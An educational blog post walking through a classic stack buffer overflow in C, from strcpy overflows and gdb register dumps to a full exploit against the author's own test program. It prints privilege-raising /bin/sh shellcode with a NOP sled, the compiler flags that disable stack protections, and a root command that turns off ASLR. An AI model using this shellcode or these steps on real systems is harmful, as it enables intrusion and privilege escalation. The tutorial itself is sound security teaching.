Classic Attacks – Buffer Overflow

Welcome back to Technolution.  In today’s post we’re going to be looking at a classic computer security vulnerability, the buffer overflow.  This type of vulnerability can surface in many kinds of programs and has been the vector of exploitation for many real-world attacks.  Today, we will go into a medium level of detail (leaving out an in-depth assembly analysis) on buffer overflows, including what causes them, how they can be exploited, and various preventative measures.  Now, let’s get started.

First off, what is a buffer overflow?  A buffer overflow occurs when a program attempts to place more data into a buffer than the buffer has room for.  How does this manifest?  Let’s pretend we have a char array in a C program acting as a buffer for user input.  An overflow could easily happen if the user enters more characters than the buffer can hold.  In that case, without input validation, the program would have to decide what to do.  However, a computer can’t “make decisions”; all it can do is what it was programmed to do.  For a concrete example, let’s look at string copy:

char buffer[7];
char data[] = "somedata";
strcpy(buffer, data);

In the above C code, the strcpy function copies bytes starting from the memory location pointed to by data, up to and including the first null character (which marks the end of the string), into the memory beginning at the location pointed to by buffer.  The string “somedata” needs 9 bytes (8 characters plus the terminating null), but buffer was declared to be only 7 bytes long, so the 8th and 9th bytes overwrite something other than the buffer array.  This can end up causing adverse program execution.
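
One way to avoid the overflow above is to check the length before copying.  The following is a minimal sketch, not part of the original example: copy_checked is a hypothetical helper name, and refusing over-long input (rather than truncating it) is just one possible design choice.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (an assumption for illustration): copy src into dst
 * only if the string AND its terminating null byte fit in dst_size bytes.
 * Returns 0 on success, -1 if src is too long (dst is then left empty). */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t needed = strlen(src) + 1;   /* +1 for the null terminator */

    if (dst_size == 0)
        return -1;                     /* nowhere to write even a null */
    if (needed > dst_size) {
        dst[0] = '\0';                 /* refuse rather than truncate */
        return -1;
    }
    memcpy(dst, src, needed);          /* safe: needed <= dst_size */
    return 0;
}
```

With the 7-byte buffer from above, calling copy_checked(buffer, sizeof buffer, "somedata") returns -1 and leaves buffer empty instead of writing past its end.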

To understand how to exploit this, we must understand how memory is used.  When a function is called, memory must be allocated for it on the stack.  The amount of memory allocated depends on the demands of the function.  However, additional memory is allocated for a couple of pointers.  One is the saved frame pointer (sfp) and one is the return address (ra).  The return address is where the program resumes execution after the current function finishes.  Thus, for exploitation, if we can change the return address, we can change what code will be executed next, and this is exactly the point of buffer overflows.

Taking the 7 byte buffer above, our memory looks something like this:

 buffer   sfp    ra
[BBBBBBB][xxxx][xxxx]

Each B in the buffer is a byte representing a character, and each x in sfp and ra is one byte of a memory address.  Now let’s look at strcpy with a different value:

#include <stdio.h>
#include <string.h>

int main()
{
    char buffer[7];
    char data[] = "aaaaaaaaaaaaaaabbbbcccc";
    strcpy(buffer, data);    /* no bounds check: writes far past buffer */
}

Running the program we get a segmentation fault!  If we load up gdb we can see the program ends with a strange value in eip (the value loaded from the overwritten return address of the stack frame).

(gdb) run
Starting program: /tmp/.somedir/tst

Program received signal SIGSEGV, Segmentation fault.
0x63636363 in ?? ()
(gdb) info registers
eax 0xbfffdce9 -1073750807
ecx 0x0 0
edx 0x18 24
ebx 0xb76ff4 12021748
esp 0xbfffdd00 0xbfffdd00
ebp 0x62626262 0x62626262
esi 0x0 0
edi 0x0 0
eip 0x63636363 0x63636363
eflags 0x210246 [ PF ZF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

What does this mean?  What is 0x63?  If we load up an ASCII chart, we can see that hex value 0x63 is the ASCII code for “c”.  Excellent, we filled eip with “cccc,” just what we were trying to do!  We can also see that ebp (the base pointer, which is restored from the saved frame pointer) was overwritten with 0x62, the value for “b”.  Thus, we can assume we had the correct number of a’s: 7 to fill the buffer, plus 8 more to cover the extra space that sits between the buffer and the saved frame pointer.  (That gap is most likely padding or other bookkeeping the compiler placed there.  Its size depends on the compiler and its options, so it is best found by experiment, as we did here.)  All we have to do now is find the memory location of the code we want to execute, and replace the “cccc” with the four bytes of that address.  Then we will execute the program again and watch the ‘flow!
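
To make the layout concrete without touching a real stack, the overflow can be modeled on an ordinary byte array.  This is only a sketch under stated assumptions: the offsets (15 bytes before sfp, 19 before ra) are the ones observed in the run above and will differ between compilers, and simulate_overflow and read_le32 are hypothetical names introduced for illustration.

```c
#include <stdint.h>
#include <string.h>

/* Offsets observed in the article's experiment: 15 filler bytes, then the
 * saved frame pointer (sfp), then the return address (ra). They are
 * assumptions for any other compiler or build. */
enum { SFP_OFFSET = 15, RA_OFFSET = 19, FRAME_SIZE = 23 };

/* Read four bytes as a little-endian 32-bit value, as x86 would. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Model the frame as a plain byte array and "overflow" it safely:
 * the copy is capped at FRAME_SIZE, so nothing real is overwritten. */
void simulate_overflow(const char *payload, uint32_t *sfp, uint32_t *ra)
{
    unsigned char frame[FRAME_SIZE] = {0};
    size_t n = strlen(payload);

    if (n > FRAME_SIZE)
        n = FRAME_SIZE;
    memcpy(frame, payload, n);

    *sfp = read_le32(frame + SFP_OFFSET);   /* what ends up in ebp */
    *ra  = read_le32(frame + RA_OFFSET);    /* what ends up in eip */
}
```

Feeding it the 23-byte string from the test program yields 0x62626262 for sfp and 0x63636363 for ra, matching the ebp and eip values gdb reported.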

While we could potentially search through memory looking for useful code to execute, it would be more useful if we could supply the code ourselves.  Fortunately, in many cases this is possible.  This code, referred to as shellcode, comes with a few need-to-knows.  First, shellcode is machine code: raw opcodes.  For those unfamiliar with opcodes, they are the actual values (frequently read in hex) that the processor executes directly.  Due to its low-level nature, shellcode is OPERATING SYSTEM and ARCHITECTURE dependent.  This means we need different shellcode for each OS and for each hardware architecture.  Additionally, it’s important to remember that shellcode shouldn’t contain any NULL bytes (0x00), because C string handling (strcpy, environment variables) treats the first null as the end of the data and would cut the shellcode short.  The process of deriving shellcode is slightly involved and not the point of today’s article.  Luckily, there are many sources out there to find good shellcode.  Today we will use some Linux shellcode we found online which will call execve on /bin/sh, providing us with a new shell spawned by the program.  The shellcode is as follows:

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\xb0\x0b\xcd\x80"
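
Since a stray 0x00 would silently truncate the shellcode, it is worth checking for one before use.  The sketch below stores the bytes quoted above in an array and scans them; first_null_byte, shellcode and shellcode_len are hypothetical names chosen for this illustration.

```c
#include <stddef.h>

/* The shellcode bytes quoted in the article, stored as a byte array.
 * The string literal adds one trailing 0x00 that is NOT part of the code. */
const unsigned char shellcode[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
    "\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
    "\xd2\xb0\x0b\xcd\x80";

/* Length of the shellcode itself, excluding the literal's trailing null. */
const size_t shellcode_len = sizeof shellcode - 1;

/* Hypothetical helper: return the index of the first 0x00 byte in
 * code[0..len), or -1 if there is none. */
long first_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return (long)i;
    return -1;
}
```

Calling first_null_byte(shellcode, shellcode_len) returns -1 for these 41 bytes, so they can travel through a C string or an environment variable intact.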

Now that we have the code we want to execute, we need to somehow place it into memory.  There are multiple ways to do this, depending on the situation.  One way is to place the shellcode into an environment variable.  Another might be to place the shellcode in any variable which the program reads from the user or a file.  Today we’ll stick with environment variables as they are the most straightforward.  In Linux, the shell command for setting an environment variable is “export”.  Let’s see how to set a variable, SHELLCODE, with our actual shellcode:

user@localhost:~$ export SHELLCODE=$'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'\
$'\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8\xb0\x2e\xcd\x80'\
$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3'\
$'\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

We now have an environment variable called SHELLCODE with the opcodes we want to execute.  One thing to notice about the shellcode is the run of \x90 bytes at the beginning.  0x90 is the x86 opcode for no operation (“NOP”).  NOPs don’t cause anything to happen; execution just moves on to the next instruction.  These NOPs are used for padding, so that if we jump to the memory location of any of them, execution will slide forward into our actual execve code.  This padding is useful because the variable’s exact address can shift by a few bytes from one program to another.  The next thing we need to do is find the memory address of the SHELLCODE variable.  To do this we will use a C program, such as the following:

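#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    char *addr;

    if (argc < 2)
        exit(1);
    addr = getenv(argv[1]);          /* NULL if the variable is not set */
    if (addr == NULL)
        exit(1);
    printf("%p\n", (void *)addr);    /* %p is the portable pointer format */
    return 0;
}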

Upon execution, the above program will give us the memory address of the environment variable we supplied as the first argument.  Thus, we should run it with the argument SHELLCODE.  Let’s try:

user@localhost:/tmp/.somedir$ ./getmem SHELLCODE
0xbfffde83

Excellent!  We have now inserted our shellcode into memory beginning at address 0xbfffde83 via an environment variable.  Our final step is to run our vulnerable program and cause a buffer overflow that overwrites the saved return address (and therefore EIP) with the value 0xbfffde83.  But before we do, we need to talk about byte order.  There are two byte orders that matter for today’s discussion, little-endian and big-endian.  The difference between the two is the order in which the bytes of a multi-byte value are stored in memory: little-endian stores the least significant byte first, while big-endian stores the most significant byte first.  To keep this post short: x86 is little-endian, which means we need to write our memory address in reverse byte order.  Let’s re-examine our vulnerable program and overflow string:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[7];
    char data[] = "aaaaaaaaaaaaaaabbbbcccc";
    strcpy(buffer, data);
}

To change the overflow string to point to our desired memory address (0xbfffde83), we will write it as the following:

char data[] = "aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf";
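
The byte reversal above can be double-checked with a small helper rather than done by hand.  This is a minimal sketch; pack_le32 is a hypothetical name, and it assumes a 32-bit address as in the rest of this post.

```c
#include <stdint.h>

/* Hypothetical helper: store a 32-bit address in out[0..3], least
 * significant byte first, which is the order x86 keeps it in memory. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xff);          /* lowest byte  */
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);  /* highest byte */
}
```

For 0xbfffde83 this produces the bytes 0x83, 0xde, 0xff, 0xbf, the same sequence written at the end of the overflow string.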

Thus, our final program with hard-coded memory address pointing to the environmental variable with our shellcode is as follows:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[7];
    char data[] = "aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf";
    strcpy(buffer, data);
}

Finally, we’ll compile and test our program.  If everything goes correctly, it should spawn a shell.  One final note is that a lot has changed since the original days of buffer overflows.  Many compilers now automatically include buffer overflow precautions in the programs they compile.  As a result, we will have to compile our program with a couple of special options to make it vulnerable to the simple attack we’re using today.  First, we have to turn off GCC’s stack protector (stack canaries) with -fno-stack-protector.  Second, we have to allow the stack to be executable with -z execstack, since we’re storing our shellcode there.  Let’s compile and test:

user@localhost:/tmp/.somedir$ gcc -fno-stack-protector -z execstack test.c -o tst
user@localhost:/tmp/.somedir$ ./tst
sh-4.1$

There you have it, a successfully exploited buffer overflow.  If it doesn’t work, one final thing to check would be stack randomization (ASLR).  “cat /proc/sys/kernel/randomize_va_space” should show 0.  If it shows 1 or 2, run “echo 0 > /proc/sys/kernel/randomize_va_space” as root to turn it off.
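
The same check can be made from C before attempting the exploit.  The sketch below simply reads an integer from a file; read_int_setting is a hypothetical helper, and passing it /proc/sys/kernel/randomize_va_space assumes a Linux system that exposes that file.

```c
#include <stdio.h>

/* Hypothetical helper: read the integer stored in the file at `path`
 * (for example /proc/sys/kernel/randomize_va_space on Linux).
 * Returns the value, or -1 if the file cannot be opened or parsed. */
int read_int_setting(const char *path)
{
    FILE *f = fopen(path, "r");
    int value;

    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;                  /* file did not start with a number */
    fclose(f);
    return value;
}
```

A result of 0 means randomization is off; 1 or 2 means it is still enabled and the hard-coded address is unlikely to be valid on the next run.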

Buffer overflows are one of the older attack vectors when it comes to exploitation, and as such, many compilers and operating systems have developed ways to try to prevent these attacks.  However, buffer overflows are still found frequently in the wild, and many of the preventative measures have themselves been circumvented.  In the future we will examine some wargames which focus on various buffer overflows, preventative measures, and ways to defeat them.
